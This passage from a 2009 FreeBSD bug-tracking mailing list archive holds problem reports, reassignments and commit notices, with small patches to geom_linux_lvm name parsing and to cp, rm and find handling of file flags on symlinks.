From owner-freebsd-bugs@FreeBSD.ORG Sun Jun 21 03:00:20 2009 Return-Path: Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id A7490106567F for ; Sun, 21 Jun 2009 03:00:20 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:4f8:fff6::28]) by mx1.freebsd.org (Postfix) with ESMTP id B6F018FC1E for ; Sun, 21 Jun 2009 03:00:17 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.14.3/8.14.3) with ESMTP id n5L30HJw060079 for ; Sun, 21 Jun 2009 03:00:17 GMT (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.14.3/8.14.3/Submit) id n5L30Hnn060078; Sun, 21 Jun 2009 03:00:17 GMT (envelope-from gnats) Resent-Date: Sun, 21 Jun 2009 03:00:17 GMT Resent-Message-Id: <200906210300.n5L30Hnn060078@freefall.freebsd.org> Resent-From: FreeBSD-gnats-submit@FreeBSD.org (GNATS Filer) Resent-To: freebsd-bugs@FreeBSD.org Resent-Reply-To: FreeBSD-gnats-submit@FreeBSD.org, Pete Carah Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 526581065677 for ; Sun, 21 Jun 2009 02:50:07 +0000 (UTC) (envelope-from pete@port4.altadena.net) Received: from kestrel.altadena.net (kestrel.altadena.net [207.136.131.34]) by mx1.freebsd.org (Postfix) with ESMTP id 2AD498FC16 for ; Sun, 21 Jun 2009 02:50:06 +0000 (UTC) (envelope-from pete@port4.altadena.net) Received: from gate.east.altadena.net ([173.10.157.233] helo=port4.altadena.net) by kestrel.altadena.net with esmtps (TLSv1:AES256-SHA:256) (Exim 4.69) (envelope-from ) id 1MIClK-000Pyk-8N for FreeBSD-gnats-submit@freebsd.org; Sat, 20 Jun 2009 19:26:30 -0700 Received: from port4.altadena.net (localhost [127.0.0.1]) by port4.altadena.net (8.14.3/8.14.3) with ESMTP id n5L2C6oD001065 for ; Sat, 20 Jun 2009 22:12:06 -0400 (EDT) (envelope-from pete@port4.altadena.net) Received: (from pete@localhost) by port4.altadena.net (8.14.3/8.14.3/Submit) id n5L2C6KG001064; Sat, 20 Jun 2009 22:12:06 -0400 (EDT) (envelope-from pete) Message-Id: <200906210212.n5L2C6KG001064@port4.altadena.net> Date: Sat, 20 Jun 2009 22:12:06 -0400 (EDT) From: Pete Carah To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Cc: Subject: kern/135874: Geom_linux_lvm misses newer fedora defaults X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list Reply-To: Pete Carah List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sun, 21 Jun 2009 03:00:21 -0000 >Number: 135874 >Category: kern >Synopsis: Geom_linux_lvm misses newer fedora defaults >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sun Jun 21 03:00:17 UTC 2009 >Closed-Date: >Last-Modified: >Originator: Pete Carah >Release: FreeBSD 7.2-STABLE amd64 >Organization: Altadena Internet >Environment: System: FreeBSD port4.altadena.net 7.2-STABLE FreeBSD 7.2-STABLE #2 r194560M: Sat Jun 20 21:50:58 EDT 2009 pete@port4.altadena.net:/usr/obj/usr/src/sys/PORT47 amd64 >Description: Geom doesn't derive the correct name for default logical volumes in the default fedora 11 layout, which are named lv_root and lv_swap. The problem is that isalpha doesn't include underscore. >How-To-Repeat: Try to mount a linux lvm whose name contains an underscore. >Fix: --- g_linux_lvm.c (revision 194560) +++ g_linux_lvm.c (working copy) @@ -828,7 +828,8 @@ #define GRAB_NAME(tok, name, len) \ len = 0; \ - while (tok[len] && (isalpha(tok[len]) || isdigit(tok[len])) && \ + while (tok[len] && (isalpha(tok[len]) || isdigit(tok[len]) || \ + tok[len] == '_' ) && \ len < G_LLVM_NAMELEN - 1) \ len++; \ bcopy(tok, name, len); \ >Release-Note: >Audit-Trail: >Unformatted: From owner-freebsd-bugs@FreeBSD.ORG Sun Jun 21 05:07:41 2009 Return-Path: Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id EE7521065670; Sun, 21 Jun 2009 05:07:41 +0000 (UTC) (envelope-from linimon@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:4f8:fff6::28]) by mx1.freebsd.org (Postfix) with ESMTP id C40A08FC0A; Sun, 21 Jun 2009 05:07:41 +0000 (UTC) (envelope-from linimon@FreeBSD.org) Received: from freefall.freebsd.org (linimon@localhost [127.0.0.1]) by freefall.freebsd.org (8.14.3/8.14.3) with ESMTP id n5L57fbs062296; Sun, 21 Jun 2009 05:07:41 GMT (envelope-from linimon@freefall.freebsd.org) Received: (from linimon@localhost) by freefall.freebsd.org (8.14.3/8.14.3/Submit) id n5L57fN5062292; Sun, 21 Jun 2009 05:07:41 GMT (envelope-from linimon) Date: Sun, 21 Jun 2009 05:07:41 GMT Message-Id: <200906210507.n5L57fN5062292@freefall.freebsd.org> To: linimon@FreeBSD.org, freebsd-bugs@FreeBSD.org, freebsd-geom@FreeBSD.org From: linimon@FreeBSD.org Cc: Subject: Re: kern/135874: [geom] [patch] geom_linux_lvm misses newer fedora defaults X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sun, 21 Jun 2009 05:07:42 -0000 Old Synopsis: Geom_linux_lvm misses newer fedora defaults New Synopsis: [geom] [patch] geom_linux_lvm misses newer fedora defaults Responsible-Changed-From-To: freebsd-bugs->freebsd-geom Responsible-Changed-By: linimon Responsible-Changed-When: Sun Jun 21 05:07:14 UTC 2009 Responsible-Changed-Why: Over to maintainer(s). http://www.freebsd.org/cgi/query-pr.cgi?pr=135874 From owner-freebsd-bugs@FreeBSD.ORG Sun Jun 21 09:30:06 2009 Return-Path: Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 444301065673 for ; Sun, 21 Jun 2009 09:30:06 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:4f8:fff6::28]) by mx1.freebsd.org (Postfix) with ESMTP id 057BA8FC19 for ; Sun, 21 Jun 2009 09:30:06 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.14.3/8.14.3) with ESMTP id n5L9U54w093636 for ; Sun, 21 Jun 2009 09:30:05 GMT (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.14.3/8.14.3/Submit) id n5L9U514093632; Sun, 21 Jun 2009 09:30:05 GMT (envelope-from gnats) Resent-Date: Sun, 21 Jun 2009 09:30:05 GMT Resent-Message-Id: <200906210930.n5L9U514093632@freefall.freebsd.org> Resent-From: FreeBSD-gnats-submit@FreeBSD.org (GNATS Filer) Resent-To: freebsd-bugs@FreeBSD.org Resent-Reply-To: FreeBSD-gnats-submit@FreeBSD.org, Mikolaj Golub Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 8B5F71065675 for ; Sun, 21 Jun 2009 09:27:52 +0000 (UTC) (envelope-from nobody@FreeBSD.org) Received: from www.freebsd.org (www.freebsd.org [IPv6:2001:4f8:fff6::21]) by mx1.freebsd.org (Postfix) with ESMTP id 79ED28FC1B for ; Sun, 21 Jun 2009 09:27:52 +0000 (UTC) (envelope-from nobody@FreeBSD.org) Received: from www.freebsd.org (localhost [127.0.0.1]) by www.freebsd.org (8.14.3/8.14.3) with ESMTP id n5L9RqBJ026535 for ; Sun, 21 Jun 2009 09:27:52 GMT (envelope-from nobody@www.freebsd.org) Received: (from nobody@localhost) by www.freebsd.org (8.14.3/8.14.3/Submit) id n5L9RqNN026534; Sun, 21 Jun 2009 09:27:52 GMT (envelope-from nobody) Message-Id: <200906210927.n5L9RqNN026534@www.freebsd.org> Date: Sun, 21 Jun 2009 09:27:52 GMT From: Mikolaj Golub To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-3.1 Cc: Subject: kern/135882: memstat_kvm_malloc broken in 7.2-STABLE X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sun, 21 Jun 2009 09:30:06 -0000 >Number: 135882 >Category: kern >Synopsis: memstat_kvm_malloc broken in 7.2-STABLE >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sun Jun 21 09:30:05 UTC 2009 >Closed-Date: >Last-Modified: >Originator: Mikolaj Golub >Release: >Organization: >Environment: FreeBSD zhuzha.ua1 7.2-STABLE FreeBSD 7.2-STABLE #18: Wed Jun 3 14:28:49 EEST 2009 root@zhuzha.ua1:/usr/obj/usr/src/sys/DEBUG i386 >Description: memstat_kvm_malloc is broken in FreeBSD7. As a result vmstat -m does not work with crash dumps. It has already been fixed in HEAD: SVN rev 192148 on 2009-05-15 18:25:44Z by jhb Update the KVM backend for malloc stats to catch up to the internal structure BI change from the addition of DTrace malloc(9) probes. Submitted by: Ben Kelly ben of wanderview dot com I have tested this fix on 7.2-STABLE and it works well here too. So it would be nice to MFC this to FreeBSD7 as having kmalloc statistics form crashes is very useful sometimes. >How-To-Repeat: vmstat -m -M /dev/mem -N /boot/kernel/kernel and compare with the output of vmstat -m >Fix: >Release-Note: >Audit-Trail: >Unformatted: From owner-freebsd-bugs@FreeBSD.ORG Sun Jun 21 09:41:33 2009 Return-Path: Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 6389C106564A; Sun, 21 Jun 2009 09:41:32 +0000 (UTC) (envelope-from remko@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:4f8:fff6::28]) by mx1.freebsd.org (Postfix) with ESMTP id 395EA8FC0A; Sun, 21 Jun 2009 09:41:32 +0000 (UTC) (envelope-from remko@FreeBSD.org) Received: from freefall.freebsd.org (remko@localhost [127.0.0.1]) by freefall.freebsd.org (8.14.3/8.14.3) with ESMTP id n5L9fWDt009638; Sun, 21 Jun 2009 09:41:32 GMT (envelope-from remko@freefall.freebsd.org) Received: (from remko@localhost) by freefall.freebsd.org (8.14.3/8.14.3/Submit) id n5L9fWTx009634; Sun, 21 Jun 2009 09:41:32 GMT (envelope-from remko) Date: Sun, 21 Jun 2009 09:41:32 GMT Message-Id: <200906210941.n5L9fWTx009634@freefall.freebsd.org> To: remko@FreeBSD.org, freebsd-bugs@FreeBSD.org, jhb@FreeBSD.org From: remko@FreeBSD.org Cc: Subject: Re: kern/135882: MFc reminder: memstat_kvm_malloc broken in 7.2-STABLE X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sun, 21 Jun 2009 09:41:33 -0000 Old Synopsis: memstat_kvm_malloc broken in 7.2-STABLE New Synopsis: MFc reminder: memstat_kvm_malloc broken in 7.2-STABLE Responsible-Changed-From-To: freebsd-bugs->jhb Responsible-Changed-By: remko Responsible-Changed-When: Sun Jun 21 09:41:08 UTC 2009 Responsible-Changed-Why: reassign to John as MFC reminder http://www.freebsd.org/cgi/query-pr.cgi?pr=135882 From owner-freebsd-bugs@FreeBSD.ORG Sun Jun 21 09:45:31 2009 Return-Path: Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id D296E1065675; Sun, 21 Jun 2009 09:45:31 +0000 (UTC) (envelope-from remko@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:4f8:fff6::28]) by mx1.freebsd.org (Postfix) with ESMTP id A89C38FC13; Sun, 21 Jun 2009 09:45:31 +0000 (UTC) (envelope-from remko@FreeBSD.org) Received: from freefall.freebsd.org (remko@localhost [127.0.0.1]) by freefall.freebsd.org (8.14.3/8.14.3) with ESMTP id n5L9jVPY009823; Sun, 21 Jun 2009 09:45:31 GMT (envelope-from remko@freefall.freebsd.org) Received: (from remko@localhost) by freefall.freebsd.org (8.14.3/8.14.3/Submit) id n5L9jVOS009819; Sun, 21 Jun 2009 09:45:31 GMT (envelope-from remko) Date: Sun, 21 Jun 2009 09:45:31 GMT Message-Id: <200906210945.n5L9jVOS009819@freefall.freebsd.org> To: remko@FreeBSD.org, freebsd-bugs@FreeBSD.org, freebsd-fs@FreeBSD.org From: remko@FreeBSD.org Cc: Subject: Re: bin/135710: mount(8): mount -t tmpfs does not follow 'size' option X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sun, 21 Jun 2009 09:45:32 -0000 Synopsis: mount(8): mount -t tmpfs does not follow 'size' option Responsible-Changed-From-To: freebsd-bugs->freebsd-fs Responsible-Changed-By: remko Responsible-Changed-When: Sun Jun 21 09:45:21 UTC 2009 Responsible-Changed-Why: reassign to fs team http://www.freebsd.org/cgi/query-pr.cgi?pr=135710 From owner-freebsd-bugs@FreeBSD.ORG Sun Jun 21 11:34:17 2009 Return-Path: Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 703F1106566C; Sun, 21 Jun 2009 11:34:17 +0000 (UTC) (envelope-from remko@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:4f8:fff6::28]) by mx1.freebsd.org (Postfix) with ESMTP id 455898FC15; Sun, 21 Jun 2009 11:34:17 +0000 (UTC) (envelope-from remko@FreeBSD.org) Received: from freefall.freebsd.org (remko@localhost [127.0.0.1]) by freefall.freebsd.org (8.14.3/8.14.3) with ESMTP id n5LBYGYK095330; Sun, 21 Jun 2009 11:34:16 GMT (envelope-from remko@freefall.freebsd.org) Received: (from remko@localhost) by freefall.freebsd.org (8.14.3/8.14.3/Submit) id n5LBYGku095326; Sun, 21 Jun 2009 11:34:16 GMT (envelope-from remko) Date: Sun, 21 Jun 2009 11:34:16 GMT Message-Id: <200906211134.n5LBYGku095326@freefall.freebsd.org> To: tot@cs.huji.ac.il, remko@FreeBSD.org, freebsd-bugs@FreeBSD.org From: remko@FreeBSD.org Cc: Subject: Re: bin/135405: [build] [cross-compile] Failed to buildworld i386 on amd64 X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sun, 21 Jun 2009 11:34:17 -0000 Synopsis: [build] [cross-compile] Failed to buildworld i386 on amd64 State-Changed-From-To: suspended->closed State-Changed-By: remko State-Changed-When: Sun Jun 21 11:34:16 UTC 2009 State-Changed-Why: I did not hear back after a w eek, which is reasonable to do a new build with less build-threads. Also the -j8 could work as long as you properly monitor the output, the currently given output is just insufficient because the error occured earlier on. http://www.freebsd.org/cgi/query-pr.cgi?pr=135405 From owner-freebsd-bugs@FreeBSD.ORG Sun Jun 21 13:00:12 2009 Return-Path: Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 45FFB106564A for ; Sun, 21 Jun 2009 13:00:12 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:4f8:fff6::28]) by mx1.freebsd.org (Postfix) with ESMTP id 3346E8FC08 for ; Sun, 21 Jun 2009 13:00:12 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.14.3/8.14.3) with ESMTP id n5LD0BFT057142 for ; Sun, 21 Jun 2009 13:00:11 GMT (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.14.3/8.14.3/Submit) id n5LD0Bc2057141; Sun, 21 Jun 2009 13:00:11 GMT (envelope-from gnats) Date: Sun, 21 Jun 2009 13:00:11 GMT Message-Id: <200906211300.n5LD0Bc2057141@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org From: Adam K Kirchhoff Cc: Subject: Re: kern/135692: [mtx] [witness] blockable sleep lock - kernel panic on 8.0-CURRENT X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list Reply-To: Adam K Kirchhoff List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sun, 21 Jun 2009 13:00:12 -0000 The following reply was made to PR kern/135692; it has been noted by GNATS. From: Adam K Kirchhoff To: vwe@freebsd.org, bug-followup@FreeBSD.org Cc: Subject: Re: kern/135692: [mtx] [witness] blockable sleep lock - kernel panic on 8.0-CURRENT Date: Sun, 21 Jun 2009 08:51:37 -0400 vwe@freebsd.org wrote: > > Adam, > > to me, it seems like kgdb's interface has been screwed but asf hasn't. > I'll check that and all the other kgdb difficulties. It's just, I need > to go and take some sleep now. > > Please stay tuned. > > Thx, > > Volker > You were correct that this problem does not happen with invariants disabled. However, I am willing to test anything you'd like with invariants enabled again to help fix the source of the problem rather than work around it. Adam From owner-freebsd-bugs@FreeBSD.ORG Sun Jun 21 15:32:24 2009 Return-Path: Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id B51611065672; Sun, 21 Jun 2009 15:32:24 +0000 (UTC) (envelope-from arved@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:4f8:fff6::28]) by mx1.freebsd.org (Postfix) with ESMTP id 89B658FC1D; Sun, 21 Jun 2009 15:32:24 +0000 (UTC) (envelope-from arved@FreeBSD.org) Received: from freefall.freebsd.org (arved@localhost [127.0.0.1]) by freefall.freebsd.org (8.14.3/8.14.3) with ESMTP id n5LFWNZE077658; Sun, 21 Jun 2009 15:32:23 GMT (envelope-from arved@freefall.freebsd.org) Received: (from arved@localhost) by freefall.freebsd.org (8.14.3/8.14.3/Submit) id n5LFWNkV077653; Sun, 21 Jun 2009 15:32:23 GMT (envelope-from arved) Date: Sun, 21 Jun 2009 15:32:23 GMT Message-Id: <200906211532.n5LFWNkV077653@freefall.freebsd.org> To: arved@FreeBSD.org, freebsd-ports-bugs@FreeBSD.org, freebsd-bugs@FreeBSD.org From: arved@FreeBSD.org Cc: Subject: Re: bin/85011: /sbin/restore on 5.4 will not read Solaris-sparc dumps, whereas 4.x restore will X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sun, 21 Jun 2009 15:32:25 -0000 Synopsis: /sbin/restore on 5.4 will not read Solaris-sparc dumps, whereas 4.x restore will Responsible-Changed-From-To: freebsd-ports-bugs->freebsd-bugs Responsible-Changed-By: arved Responsible-Changed-When: Sun Jun 21 15:32:03 UTC 2009 Responsible-Changed-Why: This has nothing to do with ports http://www.freebsd.org/cgi/query-pr.cgi?pr=85011 From owner-freebsd-bugs@FreeBSD.ORG Sun Jun 21 15:40:03 2009 Return-Path: Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 2F2E4106566C for ; Sun, 21 Jun 2009 15:40:03 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:4f8:fff6::28]) by mx1.freebsd.org (Postfix) with ESMTP id 1D3CD8FC12 for ; Sun, 21 Jun 2009 15:40:03 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.14.3/8.14.3) with ESMTP id n5LFe2PW078421 for ; Sun, 21 Jun 2009 15:40:03 GMT (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.14.3/8.14.3/Submit) id n5LFe2ED078420; Sun, 21 Jun 2009 15:40:02 GMT (envelope-from gnats) Date: Sun, 21 Jun 2009 15:40:02 GMT Message-Id: <200906211540.n5LFe2ED078420@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org From: dfilter@FreeBSD.ORG (dfilter service) Cc: Subject: Re: bin/111226: commit references a PR X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list Reply-To: dfilter service List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sun, 21 Jun 2009 15:40:03 -0000 The following reply was made to PR bin/111226; it has been noted by GNATS. From: dfilter@FreeBSD.ORG (dfilter service) To: bug-followup@FreeBSD.org Cc: Subject: Re: bin/111226: commit references a PR Date: Sun, 21 Jun 2009 15:36:21 +0000 (UTC) Author: jilles Date: Sun Jun 21 15:36:10 2009 New Revision: 194587 URL: http://svn.freebsd.org/changeset/base/194587 Log: MFC r193086: Preserve file flags on symlinks in cp -Rp. This reported ENOSYS before. PR: bin/111226 (part of) Submitted by: Martin Kammerhofer Approved by: ed (mentor) (implicit) Modified: stable/7/bin/cp/ (props changed) stable/7/bin/cp/utils.c Modified: stable/7/bin/cp/utils.c ============================================================================== --- stable/7/bin/cp/utils.c Sun Jun 21 13:41:32 2009 (r194586) +++ stable/7/bin/cp/utils.c Sun Jun 21 15:36:10 2009 (r194587) @@ -339,7 +339,7 @@ setfile(struct stat *fs, int fd) if (!gotstat || fs->st_flags != ts.st_flags) if (fdval ? fchflags(fd, fs->st_flags) : - (islink ? (errno = ENOSYS) : + (islink ? lchflags(to.p_path, fs->st_flags) : chflags(to.p_path, fs->st_flags))) { warn("chflags: %s", to.p_path); rval = 1; _______________________________________________ svn-src-all@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/svn-src-all To unsubscribe, send any mail to "svn-src-all-unsubscribe@freebsd.org" From owner-freebsd-bugs@FreeBSD.ORG Sun Jun 21 15:50:03 2009 Return-Path: Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 6C7F61065670 for ; Sun, 21 Jun 2009 15:50:03 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:4f8:fff6::28]) by mx1.freebsd.org (Postfix) with ESMTP id 4EF208FC0A for ; Sun, 21 Jun 2009 15:50:03 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.14.3/8.14.3) with ESMTP id n5LFo3K6085855 for ; Sun, 21 Jun 2009 15:50:03 GMT (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.14.3/8.14.3/Submit) id n5LFo3jH085854; Sun, 21 Jun 2009 15:50:03 GMT (envelope-from gnats) Date: Sun, 21 Jun 2009 15:50:03 GMT Message-Id: <200906211550.n5LFo3jH085854@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org From: dfilter@FreeBSD.ORG (dfilter service) Cc: Subject: Re: bin/111226: commit references a PR X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list Reply-To: dfilter service List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sun, 21 Jun 2009 15:50:03 -0000 The following reply was made to PR bin/111226; it has been noted by GNATS. From: dfilter@FreeBSD.ORG (dfilter service) To: bug-followup@FreeBSD.org Cc: Subject: Re: bin/111226: commit references a PR Date: Sun, 21 Jun 2009 15:40:54 +0000 (UTC) Author: jilles Date: Sun Jun 21 15:40:39 2009 New Revision: 194588 URL: http://svn.freebsd.org/changeset/base/194588 Log: MFC r193087: rm, find -delete: fix removing symlinks with uchg/uappnd set Formerly, this tried to clear the flags on the symlink's target instead of the symlink itself. As before, this only happens for root or for the unlink(1) variant of rm. PR: bin/111226 (part of) Submitted by: Martin Kammerhofer Approved by: ed (mentor) (implicit) Modified: stable/7/bin/rm/ (props changed) stable/7/bin/rm/rm.c stable/7/usr.bin/find/ (props changed) stable/7/usr.bin/find/function.c Modified: stable/7/bin/rm/rm.c ============================================================================== --- stable/7/bin/rm/rm.c Sun Jun 21 15:36:10 2009 (r194587) +++ stable/7/bin/rm/rm.c Sun Jun 21 15:40:39 2009 (r194588) @@ -231,7 +231,7 @@ rm_tree(char **argv) else if (!uid && (p->fts_statp->st_flags & (UF_APPEND|UF_IMMUTABLE)) && !(p->fts_statp->st_flags & (SF_APPEND|SF_IMMUTABLE)) && - chflags(p->fts_accpath, + lchflags(p->fts_accpath, p->fts_statp->st_flags &= ~(UF_APPEND|UF_IMMUTABLE)) < 0) goto err; continue; @@ -250,7 +250,7 @@ rm_tree(char **argv) if (!uid && (p->fts_statp->st_flags & (UF_APPEND|UF_IMMUTABLE)) && !(p->fts_statp->st_flags & (SF_APPEND|SF_IMMUTABLE))) - rval = chflags(p->fts_accpath, + rval = lchflags(p->fts_accpath, p->fts_statp->st_flags &= ~(UF_APPEND|UF_IMMUTABLE)); if (rval == 0) { /* @@ -350,7 +350,7 @@ rm_file(char **argv) if (!uid && !S_ISWHT(sb.st_mode) && (sb.st_flags & (UF_APPEND|UF_IMMUTABLE)) && !(sb.st_flags & (SF_APPEND|SF_IMMUTABLE))) - rval = chflags(f, sb.st_flags & ~(UF_APPEND|UF_IMMUTABLE)); + rval = lchflags(f, sb.st_flags & ~(UF_APPEND|UF_IMMUTABLE)); if (rval == 0) { if (S_ISWHT(sb.st_mode)) rval = undelete(f); Modified: stable/7/usr.bin/find/function.c ============================================================================== --- stable/7/usr.bin/find/function.c Sun Jun 21 15:36:10 2009 (r194587) +++ stable/7/usr.bin/find/function.c Sun Jun 21 15:40:39 2009 (r194588) @@ -443,7 +443,7 @@ f_delete(PLAN *plan __unused, FTSENT *en if ((entry->fts_statp->st_flags & (UF_APPEND|UF_IMMUTABLE)) && !(entry->fts_statp->st_flags & (SF_APPEND|SF_IMMUTABLE)) && geteuid() == 0) - chflags(entry->fts_accpath, + lchflags(entry->fts_accpath, entry->fts_statp->st_flags &= ~(UF_APPEND|UF_IMMUTABLE)); /* rmdir directories, unlink everything else */ _______________________________________________ svn-src-all@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/svn-src-all To unsubscribe, send any mail to "svn-src-all-unsubscribe@freebsd.org" From owner-freebsd-bugs@FreeBSD.ORG Sun Jun 21 15:52:36 2009 Return-Path: Delivered-To: freebsd-bugs@FreeBSD.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 0DAC1106564A for ; Sun, 21 Jun 2009 15:52:36 +0000 (UTC) (envelope-from sofax@snop.idv.tw) Received: from snop8.snop.idv.tw (122-116-46-38.HINET-IP.hinet.net [122.116.46.38]) by mx1.freebsd.org (Postfix) with ESMTP id 9E3E08FC16 for ; Sun, 21 Jun 2009 15:52:35 +0000 (UTC) (envelope-from sofax@snop.idv.tw) Received: from GameXP ([192.168.1.112]) (authenticated bits=0) by snop8.snop.idv.tw (8.14.3/8.14.3) with ESMTP id n5LFIIUf008284 for ; Sun, 21 Jun 2009 23:18:22 +0800 (CST) (envelope-from sofax@snop.idv.tw) From: "My Sofax" To: Date: Sun, 21 Jun 2009 23:18:14 +0800 Message-ID: <01DB25A910AB47AB9D7A7F17A371434D@GameXP> MIME-Version: 1.0 X-Mailer: Microsoft Office Outlook 11 Thread-Index: Acnyg39UmW1KX02ARF6YyIkH7ILFpQ== X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.5579 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Content-Filtered-By: Mailman/MimeDel 2.1.5 Cc: Subject: Build a my own kernel ! X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sun, 21 Jun 2009 15:52:36 -0000 Dear Sir: When I try to build a 